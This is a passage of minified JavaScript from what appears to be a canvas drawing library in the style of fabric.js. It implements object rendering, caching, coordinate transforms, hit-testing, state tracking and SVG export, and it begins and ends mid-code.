U=this[x]!==S,K=!1;return("scaleX"===x||"scaleY"===x)&&(S=this._constrainScale(S)),"scaleX"===x&&S<0?(this.flipX=!this.flipX,S*=-1):"scaleY"===x&&S<0?(this.flipY=!this.flipY,S*=-1):"shadow"!==x||!S||S instanceof g.Shadow?"dirty"===x&&this.group&&this.group.set("dirty",S):S=new g.Shadow(S),this[x]=S,U&&(K=this.group&&this.group.isOnACache(),this.cacheProperties.indexOf(x)>-1?(this.dirty=!0,K&&this.group.set("dirty",!0)):K&&this.stateProperties.indexOf(x)>-1&&this.group.set("dirty",!0)),this},setOnGroup:function(){},getViewportTransform:function(){return this.canvas&&this.canvas.viewportTransform?this.canvas.viewportTransform:g.iMatrix.concat()},isNotVisible:function(){return 0===this.opacity||!this.width&&!this.height&&0===this.strokeWidth||!this.visible},render:function(x){this.isNotVisible()||this.canvas&&this.canvas.skipOffscreen&&!this.group&&!this.isOnScreen()||(x.save(),this._setupCompositeOperation(x),this.drawSelectionBackground(x),this.transform(x),this._setOpacity(x),this._setShadow(x,this),this.shouldCache()?(this.renderCache(),this.drawCacheOnCanvas(x)):(this._removeCacheCanvas(),this.dirty=!1,this.drawObject(x),this.objectCaching&&this.statefullCache&&this.saveState({propertySet:"cacheProperties"})),x.restore())},renderCache:function(x){x=x||{},(!this._cacheCanvas||!this._cacheContext)&&this._createCacheCanvas(),this.isCacheDirty()&&(this.statefullCache&&this.saveState({propertySet:"cacheProperties"}),this.drawObject(this._cacheContext,x.forClipping),this.dirty=!1)},_removeCacheCanvas:function(){this._cacheCanvas=null,this._cacheContext=null,this.cacheWidth=0,this.cacheHeight=0},hasStroke:function(){return this.stroke&&"transparent"!==this.stroke&&0!==this.strokeWidth},hasFill:function(){return this.fill&&"transparent"!==this.fill},needsItsOwnCache:function(){return!!("stroke"===this.paintFirst&&this.hasFill()&&this.hasStroke()&&"object"==typeof this.shadow||this.clipPath)},shouldCache:function(){return this.ownCaching=this.needsItsOwnCache()||this.objectCaching&&(!this.group||!this.group.isOnACache()),this.ownCaching},willDrawShadow:function(){return!!this.shadow&&(0!==this.shadow.offsetX||0!==this.shadow.offsetY)},drawClipPathOnCache:function(x,S){if(x.save(),x.globalCompositeOperation=S.inverted?"destination-out":"destination-in",S.absolutePositioned){var O=g.util.invertTransform(this.calcTransformMatrix());x.transform(O[0],O[1],O[2],O[3],O[4],O[5])}S.transform(x),x.scale(1/S.zoomX,1/S.zoomY),x.drawImage(S._cacheCanvas,-S.cacheTranslationX,-S.cacheTranslationY),x.restore()},drawObject:function(x,S){var O=this.fill,U=this.stroke;S?(this.fill="black",this.stroke="",this._setClippingProperties(x)):this._renderBackground(x),this._render(x),this._drawClipPath(x,this.clipPath),this.fill=O,this.stroke=U},_drawClipPath:function(x,S){!S||(S.canvas=this.canvas,S.shouldCache(),S._transformDone=!0,S.renderCache({forClipping:!0}),this.drawClipPathOnCache(x,S))},drawCacheOnCanvas:function(x){x.scale(1/this.zoomX,1/this.zoomY),x.drawImage(this._cacheCanvas,-this.cacheTranslationX,-this.cacheTranslationY)},isCacheDirty:function(x){if(this.isNotVisible())return!1;if(this._cacheCanvas&&this._cacheContext&&!x&&this._updateCacheCanvas())return!0;if(this.dirty||this.clipPath&&this.clipPath.absolutePositioned||this.statefullCache&&this.hasStateChanged("cacheProperties")){if(this._cacheCanvas&&this._cacheContext&&!x){var S=this.cacheWidth/this.zoomX,O=this.cacheHeight/this.zoomY;this._cacheContext.clearRect(-S/2,-O/2,S,O)}return!0}return!1},_renderBackground:function(x){if(this.backgroundColor){var S=this._getNonTransformedDimensions();x.fillStyle=this.backgroundColor,x.fillRect(-S.x/2,-S.y/2,S.x,S.y),this._removeShadow(x)}},_setOpacity:function(x){this.group&&!this.group._transformDone?x.globalAlpha=this.getObjectOpacity():x.globalAlpha*=this.opacity},_setStrokeStyles:function(x,S){var O=S.stroke;O&&(x.lineWidth=S.strokeWidth,x.lineCap=S.strokeLineCap,x.lineDashOffset=S.strokeDashOffset,x.lineJoin=S.strokeLineJoin,x.miterLimit=S.strokeMiterLimit,O.toLive?"percentage"===O.gradientUnits||O.gradientTransform||O.patternTransform?this._applyPatternForTransformedGradient(x,O):(x.strokeStyle=O.toLive(x,this),this._applyPatternGradientTransform(x,O)):x.strokeStyle=S.stroke)},_setFillStyles:function(x,S){var O=S.fill;O&&(O.toLive?(x.fillStyle=O.toLive(x,this),this._applyPatternGradientTransform(x,S.fill)):x.fillStyle=O)},_setClippingProperties:function(x){x.globalAlpha=1,x.strokeStyle="transparent",x.fillStyle="#000000"},_setLineDash:function(x,S){!S||0===S.length||(1&S.length&&S.push.apply(S,S),x.setLineDash(S))},_renderControls:function(x,S){var K,ee,se,O=this.getViewportTransform(),U=this.calcTransformMatrix();ee=void 0!==(S=S||{}).hasBorders?S.hasBorders:this.hasBorders,se=void 0!==S.hasControls?S.hasControls:this.hasControls,U=g.util.multiplyTransformMatrices(O,U),K=g.util.qrDecompose(U),x.save(),x.translate(K.translateX,K.translateY),x.lineWidth=1*this.borderScaleFactor,this.group||(x.globalAlpha=this.isMoving?this.borderOpacityWhenMoving:1),this.flipX&&(K.angle-=180),x.rotate(p(this.group?K.angle:this.angle)),S.forActiveSelection||this.group?ee&&this.drawBordersInGroup(x,K,S):ee&&this.drawBorders(x,S),se&&this.drawControls(x,S),x.restore()},_setShadow:function(x){if(this.shadow){var U,S=this.shadow,O=this.canvas,K=O&&O.viewportTransform[0]||1,ee=O&&O.viewportTransform[3]||1;U=S.nonScaling?{scaleX:1,scaleY:1}:this.getObjectScaling(),O&&O._isRetinaScaling()&&(K*=g.devicePixelRatio,ee*=g.devicePixelRatio),x.shadowColor=S.color,x.shadowBlur=S.blur*g.browserShadowBlurConstant*(K+ee)*(U.scaleX+U.scaleY)/4,x.shadowOffsetX=S.offsetX*K*U.scaleX,x.shadowOffsetY=S.offsetY*ee*U.scaleY}},_removeShadow:function(x){!this.shadow||(x.shadowColor="",x.shadowBlur=x.shadowOffsetX=x.shadowOffsetY=0)},_applyPatternGradientTransform:function(x,S){if(!S||!S.toLive)return{offsetX:0,offsetY:0};var O=S.gradientTransform||S.patternTransform,U=-this.width/2+S.offsetX||0,K=-this.height/2+S.offsetY||0;return"percentage"===S.gradientUnits?x.transform(this.width,0,0,this.height,U,K):x.transform(1,0,0,1,U,K),O&&x.transform(O[0],O[1],O[2],O[3],O[4],O[5]),{offsetX:U,offsetY:K}},_renderPaintInOrder:function(x){"stroke"===this.paintFirst?(this._renderStroke(x),this._renderFill(x)):(this._renderFill(x),this._renderStroke(x))},_render:function(){},_renderFill:function(x){!this.fill||(x.save(),this._setFillStyles(x,this),"evenodd"===this.fillRule?x.fill("evenodd"):x.fill(),x.restore())},_renderStroke:function(x){if(this.stroke&&0!==this.strokeWidth){if(this.shadow&&!this.shadow.affectStroke&&this._removeShadow(x),x.save(),this.strokeUniform&&this.group){var S=this.getObjectScaling();x.scale(1/S.scaleX,1/S.scaleY)}else this.strokeUniform&&x.scale(1/this.scaleX,1/this.scaleY);this._setLineDash(x,this.strokeDashArray),this._setStrokeStyles(x,this),x.stroke(),x.restore()}},_applyPatternForTransformedGradient:function(x,S){var K,O=this._limitCacheSize(this._getCacheCanvasDimensions()),U=g.util.createCanvasElement(),ee=this.canvas.getRetinaScaling(),se=O.x/this.scaleX/ee,ve=O.y/this.scaleY/ee;U.width=se,U.height=ve,(K=U.getContext("2d")).beginPath(),K.moveTo(0,0),K.lineTo(se,0),K.lineTo(se,ve),K.lineTo(0,ve),K.closePath(),K.translate(se/2,ve/2),K.scale(O.zoomX/this.scaleX/ee,O.zoomY/this.scaleY/ee),this._applyPatternGradientTransform(K,S),K.fillStyle=S.toLive(x),K.fill(),x.translate(-this.width/2-this.strokeWidth/2,-this.height/2-this.strokeWidth/2),x.scale(ee*this.scaleX/O.zoomX,ee*this.scaleY/O.zoomY),x.strokeStyle=K.createPattern(U,"no-repeat")},_findCenterFromElement:function(){return{x:this.left+this.width/2,y:this.top+this.height/2}},_assignTransformMatrixProps:function(){if(this.transformMatrix){var x=g.util.qrDecompose(this.transformMatrix);this.flipX=!1,this.flipY=!1,this.set("scaleX",x.scaleX),this.set("scaleY",x.scaleY),this.angle=x.angle,this.skewX=x.skewX,this.skewY=0}},_removeTransformMatrix:function(x){var S=this._findCenterFromElement();this.transformMatrix&&(this._assignTransformMatrixProps(),S=g.util.transformPoint(S,this.transformMatrix)),this.transformMatrix=null,x&&(this.scaleX*=x.scaleX,this.scaleY*=x.scaleY,this.cropX=x.cropX,this.cropY=x.cropY,S.x+=x.offsetLeft,S.y+=x.offsetTop,this.width=x.width,this.height=x.height),this.setPositionByOrigin(S,"center","center")},clone:function(x,S){var O=this.toObject(S);this.constructor.fromObject?this.constructor.fromObject(O,x):g.Object._fromObject("Object",O,x)},cloneAsImage:function(x,S){var O=this.toCanvasElement(S);return x&&x(new g.Image(O)),this},toCanvasElement:function(x){x||(x={});var S=g.util,O=S.saveObjectTransform(this),U=this.group,K=this.shadow,ee=Math.abs,se=(x.multiplier||1)*(x.enableRetinaScaling?g.devicePixelRatio:1);delete this.group,x.withoutTransform&&S.resetObjectTransform(this),x.withoutShadow&&(this.shadow=null);var z,f,v,ve=g.util.createCanvasElement(),le=this.getBoundingRect(!0,!0),ye=this.shadow,l={x:0,y:0};ye&&(f=ye.blur,z=ye.nonScaling?{scaleX:1,scaleY:1}:this.getObjectScaling(),l.x=2*Math.round(ee(ye.offsetX)+f)*ee(z.scaleX),l.y=2*Math.round(ee(ye.offsetY)+f)*ee(z.scaleY)),v=le.height+l.y,ve.width=Math.ceil(le.width+l.x),ve.height=Math.ceil(v);var P=new g.StaticCanvas(ve,{enableRetinaScaling:!1,renderOnAddRemove:!1,skipOffscreen:!1});"jpeg"===x.format&&(P.backgroundColor="#fff"),this.setPositionByOrigin(new g.Point(P.width/2,P.height/2),"center","center");var G=this.canvas;P.add(this);var X=P.toCanvasElement(se||1,x);return this.shadow=K,this.set("canvas",G),U&&(this.group=U),this.set(O).setCoords(),P._objects=[],P.dispose(),P=null,X},toDataURL:function(x){return x||(x={}),g.util.toDataURL(this.toCanvasElement(x),x.format||"png",x.quality||1)},isType:function(x){return arguments.length>1?Array.from(arguments).includes(this.type):this.type===x},complexity:function(){return 1},toJSON:function(x){return this.toObject(x)},rotate:function(x){var S=("center"!==this.originX||"center"!==this.originY)&&this.centeredRotation;return S&&this._setOriginToCenter(),this.set("angle",x),S&&this._resetOrigin(),this},centerH:function(){return this.canvas&&this.canvas.centerObjectH(this),this},viewportCenterH:function(){return this.canvas&&this.canvas.viewportCenterObjectH(this),this},centerV:function(){return this.canvas&&this.canvas.centerObjectV(this),this},viewportCenterV:function(){return this.canvas&&this.canvas.viewportCenterObjectV(this),this},center:function(){return this.canvas&&this.canvas.centerObject(this),this},viewportCenter:function(){return this.canvas&&this.canvas.viewportCenterObject(this),this},getLocalPointer:function(x,S){S=S||this.canvas.getPointer(x);var O=new g.Point(S.x,S.y),U=this._getLeftTopCoords();return this.angle&&(O=g.util.rotatePoint(O,U,p(-this.angle))),{x:O.x-U.x,y:O.y-U.y}},_setupCompositeOperation:function(x){this.globalCompositeOperation&&(x.globalCompositeOperation=this.globalCompositeOperation)},dispose:function(){g.runningAnimations&&g.runningAnimations.cancelByTarget(this)}}),g.util.createAccessors&&g.util.createAccessors(g.Object),b(g.Object.prototype,g.Observable),g.Object.NUM_FRACTION_DIGITS=2,g.Object.ENLIVEN_PROPS=["clipPath"],g.Object._fromObject=function(x,S,O,U){var K=g[x];S=_(S,!0),g.util.enlivenPatterns([S.fill,S.stroke],function(ee){void 0!==ee[0]&&(S.fill=ee[0]),void 0!==ee[1]&&(S.stroke=ee[1]),g.util.enlivenObjectEnlivables(S,S,function(){var se=U?new K(S[U],S):new K(S);O&&O(se)})})},g.Object.__uid=0)}(we),function(){var E=j.util.degreesToRadians,g={left:-.5,center:0,right:.5},b={top:-.5,center:0,bottom:.5};j.util.object.extend(j.Object.prototype,{translateToGivenOrigin:function(_,y,M,p,D){var S,O,U,w=_.x,x=_.y;return"string"==typeof y?y=g[y]:y-=.5,"string"==typeof p?p=g[p]:p-=.5,"string"==typeof M?M=b[M]:M-=.5,"string"==typeof D?D=b[D]:D-=.5,O=D-M,((S=p-y)||O)&&(U=this._getTransformedDimensions(),w=_.x+S*U.x,x=_.y+O*U.y),new j.Point(w,x)},translateToCenterPoint:function(_,y,M){var p=this.translateToGivenOrigin(_,y,M,"center","center");return this.angle?j.util.rotatePoint(p,_,E(this.angle)):p},translateToOriginPoint:function(_,y,M){var p=this.translateToGivenOrigin(_,"center","center",y,M);return this.angle?j.util.rotatePoint(p,_,E(this.angle)):p},getCenterPoint:function(){var _=new j.Point(this.left,this.top);return this.translateToCenterPoint(_,this.originX,this.originY)},getPointByOrigin:function(_,y){var M=this.getCenterPoint();return this.translateToOriginPoint(M,_,y)},toLocalPoint:function(_,y,M){var D,w,p=this.getCenterPoint();return D=void 0!==y&&void 0!==M?this.translateToGivenOrigin(p,"center","center",y,M):new j.Point(this.left,this.top),w=new j.Point(_.x,_.y),this.angle&&(w=j.util.rotatePoint(w,p,-E(this.angle))),w.subtractEquals(D)},setPositionByOrigin:function(_,y,M){var p=this.translateToCenterPoint(_,y,M),D=this.translateToOriginPoint(p,this.originX,this.originY);this.set("left",D.x),this.set("top",D.y)},adjustPosition:function(_){var w,x,y=E(this.angle),M=this.getScaledWidth(),p=j.util.cos(y)*M,D=j.util.sin(y)*M;this.left+=p*((x="string"==typeof _?g[_]:_-.5)-(w="string"==typeof this.originX?g[this.originX]:this.originX-.5)),this.top+=D*(x-w),this.setCoords(),this.originX=_},_setOriginToCenter:function(){this._originalOriginX=this.originX,this._originalOriginY=this.originY;var _=this.getCenterPoint();this.originX="center",this.originY="center",this.left=_.x,this.top=_.y},_resetOrigin:function(){var _=this.translateToOriginPoint(this.getCenterPoint(),this._originalOriginX,this._originalOriginY);this.originX=this._originalOriginX,this.originY=this._originalOriginY,this.left=_.x,this.top=_.y,this._originalOriginX=null,this._originalOriginY=null},_getLeftTopCoords:function(){return this.translateToOriginPoint(this.getCenterPoint(),"left","top")}})}(),function(){var g=j.util,b=g.degreesToRadians,_=g.multiplyTransformMatrices,y=g.transformPoint;g.object.extend(j.Object.prototype,{oCoords:null,aCoords:null,lineCoords:null,ownMatrixCache:null,matrixCache:null,controls:{},_getCoords:function(M,p){return p?M?this.calcACoords():this.calcLineCoords():((!this.aCoords||!this.lineCoords)&&this.setCoords(!0),M?this.aCoords:this.lineCoords)},getCoords:function(M,p){return function E(M){return[new j.Point(M.tl.x,M.tl.y),new j.Point(M.tr.x,M.tr.y),new j.Point(M.br.x,M.br.y),new j.Point(M.bl.x,M.bl.y)]}(this._getCoords(M,p))},intersectsWithRect:function(M,p,D,w){var x=this.getCoords(D,w);return"Intersection"===j.Intersection.intersectPolygonRectangle(x,M,p).status},intersectsWithObject:function(M,p,D){return"Intersection"===j.Intersection.intersectPolygonPolygon(this.getCoords(p,D),M.getCoords(p,D)).status||M.isContainedWithinObject(this,p,D)||this.isContainedWithinObject(M,p,D)},isContainedWithinObject:function(M,p,D){for(var w=this.getCoords(p,D),S=0,O=M._getImageLines(p?M.aCoords:M.lineCoords);S<4;S++)if(!M.containsPoint(w[S],O))return!1;return!0},isContainedWithinRect:function(M,p,D,w){var x=this.getBoundingRect(D,w);return x.left>=M.x&&x.left+x.width<=p.x&&x.top>=M.y&&x.top+x.height<=p.y},containsPoint:function(M,S,D,w){var x=this._getCoords(D,w),O=(S=S||this._getImageLines(x),this._findCrossPoints(M,S));return 0!==O&&O%2==1},isOnScreen:function(M){if(!this.canvas)return!1;var p=this.canvas.vptCoords.tl,D=this.canvas.vptCoords.br;return!(!this.getCoords(!0,M).some(function(x){return x.x<=D.x&&x.x>=p.x&&x.y<=D.y&&x.y>=p.y})&&!this.intersectsWithRect(p,D,!0,M))||this._containsCenterOfCanvas(p,D,M)},_containsCenterOfCanvas:function(M,p,D){return!!this.containsPoint({x:(M.x+p.x)/2,y:(M.y+p.y)/2},null,!0,D)},isPartiallyOnScreen:function(M){if(!this.canvas)return!1;var p=this.canvas.vptCoords.tl,D=this.canvas.vptCoords.br;return!!this.intersectsWithRect(p,D,!0,M)||this.getCoords(!0,M).every(function(x){return(x.x>=D.x||x.x<=p.x)&&(x.y>=D.y||x.y<=p.y)})&&this._containsCenterOfCanvas(p,D,M)},_getImageLines:function(M){return{topline:{o:M.tl,d:M.tr},rightline:{o:M.tr,d:M.br},bottomline:{o:M.br,d:M.bl},leftline:{o:M.bl,d:M.tl}}},_findCrossPoints:function(M,p){var w,x,S,O,K,U=0;for(var ee in p)if(!((K=p[ee]).o.y<M.y&&K.d.y<M.y||K.o.y>=M.y&&K.d.y>=M.y||(K.o.x===K.d.x&&K.o.x>=M.x?O=K.o.x:(w=(K.d.y-K.o.y)/(K.d.x-K.o.x),x=M.y-0*M.x,S=K.o.y-w*K.o.x,O=-(x-S)/(0-w)),O>=M.x&&(U+=1),2!==U)))break;return U},getBoundingRect:function(M,p){var D=this.getCoords(M,p);return g.makeBoundingBoxFromPoints(D)},getScaledWidth:function(){return this._getTransformedDimensions().x},getScaledHeight:function(){return this._getTransformedDimensions().y},_constrainScale:function(M){return Math.abs(M)<this.minScaleLimit?M<0?-this.minScaleLimit:this.minScaleLimit:0===M?1e-4:M},scale:function(M){return this._set("scaleX",M),this._set("scaleY",M),this.setCoords()},scaleToWidth:function(M,p){var D=this.getBoundingRect(p).width/this.getScaledWidth();return this.scale(M/this.width/D)},scaleToHeight:function(M,p){var D=this.getBoundingRect(p).height/this.getScaledHeight();return this.scale(M/this.height/D)},calcLineCoords:function(){var M=this.getViewportTransform(),p=this.padding,D=b(this.angle),S=g.cos(D)*p,O=g.sin(D)*p,U=S+O,K=S-O,ee=this.calcACoords(),se={tl:y(ee.tl,M),tr:y(ee.tr,M),bl:y(ee.bl,M),br:y(ee.br,M)};return p&&(se.tl.x-=K,se.tl.y-=U,se.tr.x+=U,se.tr.y-=K,se.bl.x-=U,se.bl.y+=K,se.br.x+=K,se.br.y+=U),se},calcOCoords:function(){var M=this._calcRotateMatrix(),p=this._calcTranslateMatrix(),D=this.getViewportTransform(),w=_(D,p),x=_(w,M),S=(x=_(x,[1/D[0],0,0,1/D[3],0,0]),this._calculateCurrentDimensions()),O={};return this.forEachControl(function(U,K,ee){O[K]=U.positionHandler(S,x,ee)}),O},calcACoords:function(){var M=this._calcRotateMatrix(),p=this._calcTranslateMatrix(),D=_(p,M),w=this._getTransformedDimensions(),x=w.x/2,S=w.y/2;return{tl:y({x:-x,y:-S},D),tr:y({x,y:-S},D),bl:y({x:-x,y:S},D),br:y({x,y:S},D)}},setCoords:function(M){return this.aCoords=this.calcACoords(),this.lineCoords=this.group?this.aCoords:this.calcLineCoords(),M||(this.oCoords=this.calcOCoords(),this._setCornerCoords&&this._setCornerCoords()),this},_calcRotateMatrix:function(){return g.calcRotateMatrix(this)},_calcTranslateMatrix:function(){var M=this.getCenterPoint();return[1,0,0,1,M.x,M.y]},transformMatrixKey:function(M){var p="_",D="";return!M&&this.group&&(D=this.group.transformMatrixKey(M)+p),D+this.top+p+this.left+p+this.scaleX+p+this.scaleY+p+this.skewX+p+this.skewY+p+this.angle+p+this.originX+p+this.originY+p+this.width+p+this.height+p+this.strokeWidth+this.flipX+this.flipY},calcTransformMatrix:function(M){var p=this.calcOwnMatrix();if(M||!this.group)return p;var D=this.transformMatrixKey(M),w=this.matrixCache||(this.matrixCache={});return w.key===D?w.value:(this.group&&(p=_(this.group.calcTransformMatrix(!1),p)),w.key=D,w.value=p,p)},calcOwnMatrix:function(){var M=this.transformMatrixKey(!0),p=this.ownMatrixCache||(this.ownMatrixCache={});if(p.key===M)return p.value;var D=this._calcTranslateMatrix(),w={angle:this.angle,translateX:D[4],translateY:D[5],scaleX:this.scaleX,scaleY:this.scaleY,skewX:this.skewX,skewY:this.skewY,flipX:this.flipX,flipY:this.flipY};return p.key=M,p.value=g.composeMatrix(w),p.value},_getNonTransformedDimensions:function(){var M=this.strokeWidth;return{x:this.width+M,y:this.height+M}},_getTransformedDimensions:function(M,p){void 0===M&&(M=this.skewX),void 0===p&&(p=this.skewY);var D,w,x,S=0===M&&0===p;if(this.strokeUniform?(w=this.width,x=this.height):(w=(D=this._getNonTransformedDimensions()).x,x=D.y),S)return this._finalizeDimensions(w*this.scaleX,x*this.scaleY);var O=g.sizeAfterTransform(w,x,{scaleX:this.scaleX,scaleY:this.scaleY,skewX:M,skewY:p});return this._finalizeDimensions(O.x,O.y)},_finalizeDimensions:function(M,p){return this.strokeUniform?{x:M+this.strokeWidth,y:p+this.strokeWidth}:{x:M,y:p}},_calculateCurrentDimensions:function(){var M=this.getViewportTransform(),p=this._getTransformedDimensions();return y(p,M,!0).scalarAdd(2*this.padding)}})}(),j.util.object.extend(j.Object.prototype,{sendToBack:function(){return this.group?j.StaticCanvas.prototype.sendToBack.call(this.group,this):this.canvas&&this.canvas.sendToBack(this),this},bringToFront:function(){return this.group?j.StaticCanvas.prototype.bringToFront.call(this.group,this):this.canvas&&this.canvas.bringToFront(this),this},sendBackwards:function(E){return this.group?j.StaticCanvas.prototype.sendBackwards.call(this.group,this,E):this.canvas&&this.canvas.sendBackwards(this,E),this},bringForward:function(E){return this.group?j.StaticCanvas.prototype.bringForward.call(this.group,this,E):this.canvas&&this.canvas.bringForward(this,E),this},moveTo:function(E){return this.group&&"activeSelection"!==this.group.type?j.StaticCanvas.prototype.moveTo.call(this.group,this,E):this.canvas&&this.canvas.moveTo(this,E),this}}),function(){function E(b,_){if(_){if(_.toLive)return b+": url(#SVGID_"+_.id+"); ";var y=new j.Color(_),M=b+": "+y.toRgb()+"; ",p=y.getAlpha();return 1!==p&&(M+=b+"-opacity: "+p.toString()+"; "),M}return b+": none; "}var g=j.util.toFixed;j.util.object.extend(j.Object.prototype,{getSvgStyles:function(b){var _=this.fillRule?this.fillRule:"nonzero",y=this.strokeWidth?this.strokeWidth:"0",M=this.strokeDashArray?this.strokeDashArray.join(" "):"none",p=this.strokeDashOffset?this.strokeDashOffset:"0",D=this.strokeLineCap?this.strokeLineCap:"butt",w=this.strokeLineJoin?this.strokeLineJoin:"miter",x=this.strokeMiterLimit?this.strokeMiterLimit:"4",S=void 0!==this.opacity?this.opacity:"1",O=this.visible?"":" visibility: hidden;",U=b?"":this.getSvgFilter(),K=E("fill",this.fill);return[E("stroke",this.stroke),"stroke-width: ",y,"; ","stroke-dasharray: ",M,"; ","stroke-linecap: ",D,"; ","stroke-dashoffset: ",p,"; ","stroke-linejoin: ",w,"; ","stroke-miterlimit: ",x,"; ",K,"fill-rule: ",_,"; ","opacity: ",S,";",U,O].join("")},getSvgSpanStyles:function(b,_){var y="; ",p=b.fontFamily?"font-family: "+(-1===b.fontFamily.indexOf("'")&&-1===b.fontFamily.indexOf('"')?"'"+b.fontFamily+"'":b.fontFamily)+y:"",M=b.strokeWidth?"stroke-width: "+b.strokeWidth+y:"",D=b.fontSize?"font-size: "+b.fontSize+"px"+y:"",w=b.fontStyle?"font-style: "+b.fontStyle+y:"",x=b.fontWeight?"font-weight: "+b.fontWeight+y:"",S=b.fill?E("fill",b.fill):"",O=b.stroke?E("stroke",b.stroke):"",U=this.getSvgTextDecoration(b);return U&&(U="text-decoration: "+U+y),[O,M,p,D,w,x,U,S,b.deltaY?"baseline-shift: "+-b.deltaY+"; ":"",_?"white-space: pre; ":""].join("")},getSvgTextDecoration:function(b){return["overline","underline","line-through"].filter(function(_){return b[_.replace("-","")]}).join(" ")},getSvgFilter:function(){return this.shadow?"filter: url(#SVGID_"+this.shadow.id+");":""},getSvgCommons:function(){return[this.id?'id="'+this.id+'" ':"",this.clipPath?'clip-path="url(#'+this.clipPath.clipPathId+')" ':""].join("")},getSvgTransform:function(b,_){var y=b?this.calcTransformMatrix():this.calcOwnMatrix();return'transform="'+j.util.matrixToSVG(y)+(_||"")+'" '},_setSVGBg:function(b){if(this.backgroundColor){var _=j.Object.NUM_FRACTION_DIGITS;b.push("\t\t<rect ",this._getFillAttributes(this.backgroundColor),' x="',g(-this.width/2,_),'" y="',g(-this.height/2,_),'" width="',g(this.width,_),'" height="',g(this.height,_),'"></rect>\n')}},toSVG:function(b){return this._createBaseSVGMarkup(this._toSVG(b),{reviver:b})},toClipPathSVG:function(b){return"\t"+this._createBaseClipPathSVGMarkup(this._toSVG(b),{reviver:b})},_createBaseClipPathSVGMarkup:function(b,_){var y=(_=_||{}).reviver,p=[this.getSvgTransform(!0,_.additionalTransform||""),this.getSvgCommons()].join(""),D=b.indexOf("COMMON_PARTS");return b[D]=p,y?y(b.join("")):b.join("")},_createBaseSVGMarkup:function(b,_){var ee,ve,y=(_=_||{}).noStyle,M=_.reviver,p=y?"":'style="'+this.getSvgStyles()+'" ',D=_.withShadow?'style="'+this.getSvgFilter()+'" ':"",w=this.clipPath,x=this.strokeUniform?'vector-effect="non-scaling-stroke" ':"",S=w&&w.absolutePositioned,O=this.stroke,U=this.fill,K=this.shadow,se=[],le=b.indexOf("COMMON_PARTS"),ye=_.additionalTransform;return w&&(w.clipPathId="CLIPPATH_"+j.Object.__uid++,ve='<clipPath id="'+w.clipPathId+'" >\n'+w.toClipPathSVG(M)+"</clipPath>\n"),S&&se.push("<g ",D,this.getSvgCommons()," >\n"),se.push("<g ",this.getSvgTransform(!1),S?"":D+this.getSvgCommons()," >\n"),ee=[p,x,y?"":this.addPaintOrder()," ",ye?'transform="'+ye+'" ':""].join(""),b[le]=ee,U&&U.toLive&&se.push(U.toSVG(this)),O&&O.toLive&&se.push(O.toSVG(this)),K&&se.push(K.toSVG(this)),w&&se.push(ve),se.push(b.join("")),se.push("</g>\n"),S&&se.push("</g>\n"),M?M(se.join("")):se.join("")},addPaintOrder:function(){return"fill"!==this.paintFirst?' paint-order="'+this.paintFirst+'" ':""}})}(),function(){var E=j.util.object.extend,g="stateProperties";function b(y,M,p){var D={};p.forEach(function(x){D[x]=y[x]}),E(y[M],D,!0)}function _(y,M,p){if(y===M)return!0;if(Array.isArray(y)){if(!Array.isArray(M)||y.length!==M.length)return!1;for(var D=0,w=y.length;D<w;D++)if(!_(y[D],M[D]))return!1;return!0}if(y&&"object"==typeof y){var S,x=Object.keys(y);if(!M||"object"!=typeof M||!p&&x.length!==Object.keys(M).length)return!1;for(D=0,w=x.length;D<w;D++)if("canvas"!==(S=x[D])&&"group"!==S&&!_(y[S],M[S]))return!1;return!0}}j.util.object.extend(j.Object.prototype,{hasStateChanged:function(y){var M="_"+(y=y||g);return Object.keys(this[M]).length<this[y].length||!_(this[M],this,!0)},saveState:function(y){var M=y&&y.propertySet||g,p="_"+M;return this[p]?(b(this,p,this[M]),y&&y.stateProperties&&b(this,p,y.stateProperties),this):this.setupState(y)},setupState:function(y){var M=(y=y||{}).propertySet||g;return y.propertySet=M,this["_"+M]={},this.saveState(y),this}})}(),function(){var E=j.util.degreesToRadians;j.util.object.extend(j.Object.prototype,{_findTargetCorner:function(g,b){if(!this.hasControls||this.group||!this.canvas||this.canvas._activeObject!==this)return!1;var M,p,x,_=g.x,y=g.y,D=Object.keys(this.oCoords),w=D.length-1;for(this.__corner=0;w>=0;w--)if(this.isControlVisible(x=D[w])&&(p=this._getImageLines(b?this.oCoords[x].touchCorner:this.oCoords[x].corner),0!==(M=this._findCrossPoints({x:_,y},p))&&M%2==1))return this.__corner=x,x;return!1},forEachControl:function(g){for(var b in this.controls)g(this.controls[b],b,this)},_setCornerCoords:function(){var g=this.oCoords;for(var b in g){var _=this.controls[b];g[b].corner=_.calcCornerCoords(this.angle,this.cornerSize,g[b].x,g[b].y,!1),g[b].touchCorner=_.calcCornerCoords(this.angle,this.touchCornerSize,g[b].x,g[b].y,!0)}},drawSelectionBackground:function(g){if(!this.selectionBackgroundColor||this.canvas&&!this.canvas.interactive||this.canvas&&this.canvas._activeObject!==this)return this;g.save();var b=this.getCenterPoint(),_=this._calculateCurrentDimensions(),y=this.canvas.viewportTransform;return g.translate(b.x,b.y),g.scale(1/y[0],1/y[3]),g.rotate(E(this.angle)),g.fillStyle=this.selectionBackgroundColor,g.fillRect(-_.x/2,-_.y/2,_.x,_.y),g.restore(),this},drawBorders:function(g,b){b=b||{};var _=this._calculateCurrentDimensions(),y=this.borderScaleFactor,M=_.x+y,p=_.y+y,D=void 0!==b.hasControls?b.hasControls:this.hasControls,w=!1;return g.save(),g.strokeStyle=b.borderColor||this.borderColor,this._setLineDash(g,b.borderDashArray||this.borderDashArray),g.strokeRect(-M/2,-p/2,M,p),D&&(g.beginPath(),this.forEachControl(function(x,S,O){x.withConnection&&x.getVisibility(O,S)&&(w=!0,g.moveTo(x.x*M,x.y*p),g.lineTo(x.x*M+x.offsetX,x.y*p+x.offsetY))}),w&&g.stroke()),g.restore(),this},drawBordersInGroup:function(g,b,_){_=_||{};var y=j.util.sizeAfterTransform(this.width,this.height,b),M=this.strokeWidth,p=this.strokeUniform,D=this.borderScaleFactor,w=y.x+M*(p?this.canvas.getZoom():b.scaleX)+D,x=y.y+M*(p?this.canvas.getZoom():b.scaleY)+D;return g.save(),this._setLineDash(g,_.borderDashArray||this.borderDashArray),g.strokeStyle=_.borderColor||this.borderColor,g.strokeRect(-w/2,-x/2,w,x),g.restore(),this},drawControls:function(g,b){b=b||{},g.save();var y,M,_=this.canvas.getRetinaScaling();return 